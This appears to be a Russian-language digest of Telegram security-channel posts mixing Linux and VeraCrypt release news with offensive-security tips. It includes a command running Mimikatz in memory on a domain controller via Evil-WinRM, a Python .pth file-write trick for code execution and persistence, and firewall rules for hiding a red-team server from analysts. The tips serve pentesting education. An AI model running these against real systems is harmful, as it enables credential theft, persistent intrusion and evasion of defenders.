www.opennet.ru
Релиз ядра Linux 6.13
После двух месяцев разработки Линус Торвальдс представил релиз ядра Linux 6.13. Среди наиболее заметных изменений: режим ленивого вытеснения в планировщике задач, поддержка атомарной записи в XFS и Ext4, механизм "multigrain timestamps", адаптивный режим…
🔗Ссылка:
https://opennet.ru/62587/
https://opennet.ru/62587/
Forwarded from SecuriXy.kz
Век живи - век учись...
Интересный встроенный функционал #Evil-WinRM узнал недавно изучая очередной «индусский» курс.
Суть в то, что у Evil-WinRM есть встроенный тулсет доступный через menu.
И есть например - функция Invoke-Mimikatz которая позволяет загружать и выполнять утилиту Mimikatz непосредственно в памяти целевой системы, что снижает вероятность обнаружения антивирусными средствами.
А еще, он поддерживает переменные при выполнении команд, и если нам нужно исполнить скрипт или еще что-то не на целевой заовненной системе, а за ее пределами, например на контроллере домена, без необходимости пробрасывания туннельки - мы можем использовать это для выполнения наших команд безтельно (в памяти).
На примере ниже - исполнение мимикатза из памяти на контролле домена DC через WinRM сессию с пользовательского хоста
Интересный встроенный функционал #Evil-WinRM узнал недавно изучая очередной «индусский» курс.
Суть в то, что у Evil-WinRM есть встроенный тулсет доступный через menu.
И есть например - функция Invoke-Mimikatz которая позволяет загружать и выполнять утилиту Mimikatz непосредственно в памяти целевой системы, что снижает вероятность обнаружения антивирусными средствами.
А еще, он поддерживает переменные при выполнении команд, и если нам нужно исполнить скрипт или еще что-то не на целевой заовненной системе, а за ее пределами, например на контроллере домена, без необходимости пробрасывания туннельки - мы можем использовать это для выполнения наших команд безтельно (в памяти).
На примере ниже - исполнение мимикатза из памяти на контролле домена DC через WinRM сессию с пользовательского хоста
*Evil-WinRM* PS UserHost#> Invoke-Command -computername dc.intranet.poo -scriptblock ${function:Invoke-Mimikatz} -credential $cred
PANIX - это мощная, модульная и легко настраиваемая платформа сохранения данных Linux, предназначенная для исследователей безопасности, инженеров по обнаружению, тестировщиков на проникновение, энтузиастов CTF и многих других. Созданная с учетом универсальности, PANIX делает упор на функциональность, что делает ее незаменимым инструментом для понимания и внедрения широкого спектра методов сохранения данных.
🔗Ссылка:
https://github.com/Aegrah/PANIX
🔗Ссылка:
https://github.com/Aegrah/PANIX
GitHub
GitHub - Aegrah/PANIX: Customizable Linux Persistence Tool for Security Research and Detection Engineering.
Customizable Linux Persistence Tool for Security Research and Detection Engineering. - Aegrah/PANIX
Forwarded from Похек
#tip #tips #bugbounty #nextjs #vercel
Есть небольшой лайфхак, так сказать, который позволяет одномоментно вывести все существующие роуты в NextJS приложении.
В Инструментах разработчика > Консоль >
allow pasting >console.log(__BUILD_MANIFEST.sortedPages.join('\n'));Скрин1 был честно украден из X, т.к. скрины с проекта нельзя показывать, иначе вы слишком быстро поймёте что за компания))
Скрин2, это из моей платформы обучения. Как видите, у меня это уже не работает :)
👩 Работа этой строки очень проста. Берётся __BUILD_MANIFEST, в котором перечисленны все страницы и просто через join их выводим. Работает ли это до сих пор? Да, буквально недавно на одном из проектов попалось это. На главной странице отдавался 404, попытки активно или пассивно профаззить не дали результатов.
Пришлось выйти в интернет с этим вопросом и немного покопаться в документации, чтобы прийти к этой команде. Также ещё по опыту своей разработки и отслеживания как разрабы пишут код, хочу заметить что очень редко отключают console.log, console.error и т.д. на продакшен версиях сайта. А сделать это очень легко:
module.exports = {
compiler: {
removeConsole: process.env.NODE_ENV === "production",
},
};🐇 Есть ещё классное браузерное расширение Next.js Explorer. У меня о нём спрашивали на Bugs Zone. Вот решил напомнить. Оно позволяет показывать какие данные хранятся в приложении. Иногда может подсветить даже какие-то секреты, если они указаны не в .env
На самом деле NextJS очень дырявый, у него относительно часто появляются CVE. Так что приходится следить ещё и за этим)
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from hx0110
Code execution via Site-Specific Configuration Hooks
В статейке нашел очень интересный метод эксплуатации File write to RCE в Python за счет использования функционала site-specific configuration hooks. (Он конечно не новый, но мне показалось очень интересным)
Чтобы получить исполнение необходимо:
1. Записать python код начинающийся с
2. И при пораждении нового процесса питона выполниться код
Подробнее
P.S. Persistence также возможен, так как код исполняется при каждом запуске питона
#web #python #RCE
В статейке нашел очень интересный метод эксплуатации File write to RCE в Python за счет использования функционала site-specific configuration hooks. (Он конечно не новый, но мне показалось очень интересным)
Чтобы получить исполнение необходимо:
1. Записать python код начинающийся с
import или import\t в ~/.local/lib/pythonX.Y/site-packages/arb_name.pth с расширением .pthuser@host:~$ echo 'import os;os.system("whoami>/tmp/x")' > .local/lib/python3.12/site-packages/arbitrary_name.pth2. И при пораждении нового процесса питона выполниться код
user@host:~$ python3
>>> CTRL + D
user@host:~$ cat /tmp/x
user
Подробнее
P.S. Persistence также возможен, так как код исполняется при каждом запуске питона
#web #python #RCE
Sonarsource
Pretalx Vulnerabilities: How to get accepted at every conference
We recently discovered two vulnerabilities in pretalx and found a generic technique to gain code execution from a file write.
GitHub
GitHub - scmanjarrez/CVEScannerV2: Nmap script that scans for probable vulnerabilities based on services discovered in open ports.
Nmap script that scans for probable vulnerabilities based on services discovered in open ports. - scmanjarrez/CVEScannerV2
Скрипт Nmap, который сканирует возможные уязвимости на основе сервисов, обнаруженных в открытых портах.
🔗Ссылка:
https://github.com/scmanjarrez/CVEScannerV2
🔗Ссылка:
https://github.com/scmanjarrez/CVEScannerV2
🔥2
Forwarded from Пакет Безопасности
Да оплати ты ей уже корзину
На российских маркетплейсах (названия вы сами знаете) начали всё чаще появляться уже зараженные вредоносами товары: USB-кабели, переходники, сетевые адаптеры, роутеры, устройства для умного дома.
Про такого типа устройства мы с вами уже говорили в этом посте. Суть в том, что смышленые продавцы хотят получить прибыль не только с разницы между стоимостью закупки и продажи товара, но и с данных, которыми они смогут завладеть, если вы подключите их устройство в сеть или к своему смартфону. Ну а если вы это сделаете не только дома, а еще и в офисе, то вообще можете озолотить этих селлеров.
К слову, такие инфицированные устройства для продавцов стоят на порядок дороже обычных (по понятным причинам), но и окупаемость у них мощнее, если они попадут в нужные руки.
Для базовой защиты от такой угрозы стоит покупать технику только у проверенных продавцов и в магазинах с хорошей репутацией, но проблема в том, что это может быть атака через цепочку поставок, о которой может не знать даже добросовестный продавец. В общем,будьте осторожны так и живем.
#Кибергигиена
⚡️ Пакет Безопасности | Чат | 🛍 Другие каналы
На российских маркетплейсах (названия вы сами знаете) начали всё чаще появляться уже зараженные вредоносами товары: USB-кабели, переходники, сетевые адаптеры, роутеры, устройства для умного дома.
Про такого типа устройства мы с вами уже говорили в этом посте. Суть в том, что смышленые продавцы хотят получить прибыль не только с разницы между стоимостью закупки и продажи товара, но и с данных, которыми они смогут завладеть, если вы подключите их устройство в сеть или к своему смартфону. Ну а если вы это сделаете не только дома, а еще и в офисе, то вообще можете озолотить этих селлеров.
К слову, такие инфицированные устройства для продавцов стоят на порядок дороже обычных (по понятным причинам), но и окупаемость у них мощнее, если они попадут в нужные руки.
Для базовой защиты от такой угрозы стоит покупать технику только у проверенных продавцов и в магазинах с хорошей репутацией, но проблема в том, что это может быть атака через цепочку поставок, о которой может не знать даже добросовестный продавец. В общем,
#Кибергигиена
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from REDtalk (Alexey)
This media is not supported in your browser
VIEW IN TELEGRAM
Всё в порядке, мы живы. Начинаем вкатываться в новый год.
Допустим у нас есть внешний сервер для проведения пентестов, редтимов и всего этого, и мы хотим его спрятать от посторонних глаз ботов и сок-аналитиков. Звучит просто, но что, если на сервере висит открытый порт? Как с ним быть?
Убрать это просто. Достаточно добавить правило блокировки пакетов в межсетевой экран
nft add rule inet filter input icmp type echo-request drop
Для начала на всякий случай стоит добавить правила на дроп всех соединений. VPS-провайдеры любят вместе с дистрибутивом ставить какой-нибудь агент заббикса. В этом случае лучше написать правила на блокировку всего трафика и потом по мере необходимости добавлять белые списки:
# Очистка текущих правил
sudo nft flush ruleset
# Создание таблицы и цепочек
nft add table inet filter
nft add chain inet filter input { type filter hook input priority 0; policy drop; }
nft add chain inet filter output { type filter hook output priority 0; policy drop; }
nft add chain inet filter forward { type filter hook forward priority 0; policy drop; }
# Исключение для lo
nft add rule inet filter input iif lo accept
nft add rule inet filter output oif lo accept
# Разрешение трафика для 22/tcp порта
nft add rule inet filter input ct state established,related accept
nft add rule inet filter output ct state established,related accept
nft add rule inet filter input tcp dport 22 ct state new accept
nft add rule inet filter output tcp sport 22 accept
nft list ruleset > /etc/nftables.conf
Для скрытия открытого порта достаточно переместить его на нестандартный (например, tcp/64022 вместо tcp/22). Это можно сделать, не изменяя конфигурацию сервиса, на котором открыт сокет:
nft add chain ip nat prerouting { type nat hook prerouting priority 0; } nft add chain ip nat postrouting { type nat hook postrouting priority 100; }
nft add rule ip nat prerouting tcp dport 64022 dnat to :22Или, если не хочется возится с правилами, можно использовать socat:
socat TCP-LISTEN:64022,fork TCP:localhost:22
Но можно сделать еще лучше — фильтровать соединения от всех IP-адресов, которые не выполнили заданные условия. Я сделал для этого небольшой
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from PWN AI (Artyom Semenov)
Закинул на ОРДУ материал по безопасности агентов. Хотя там не только речь про сами угрозы, но и про кейсы применения агентов в ИБ.
https://cyberorda.com/llm_agent_security/
Жду ваших репостов ! Предложения по наполнению можно написать в ISSUE.
А ещё вы можете посмотреть на орде про MlSecOps и стандарты по AppSec.
https://cyberorda.com/llm_agent_security/
Жду ваших репостов ! Предложения по наполнению можно написать в ISSUE.
А ещё вы можете посмотреть на орде про MlSecOps и стандарты по AppSec.
www.opennet.ru
Выпуск системы шифрования дисковых разделов VeraCrypt 1.26.19
Опубликован выпуск проекта VeraCrypt 1.26.18, развивающего форк системы шифрования дисковых разделов TrueCrypt, прекратившей своё существование. VeraCrypt примечателен заменой используемого в TrueCrypt алгоритма RIPEMD-160 на SHA-512 и SHA-256, увеличением…
🔗Ссылка:
https://opennet.ru/62593/
https://opennet.ru/62593/
🔥2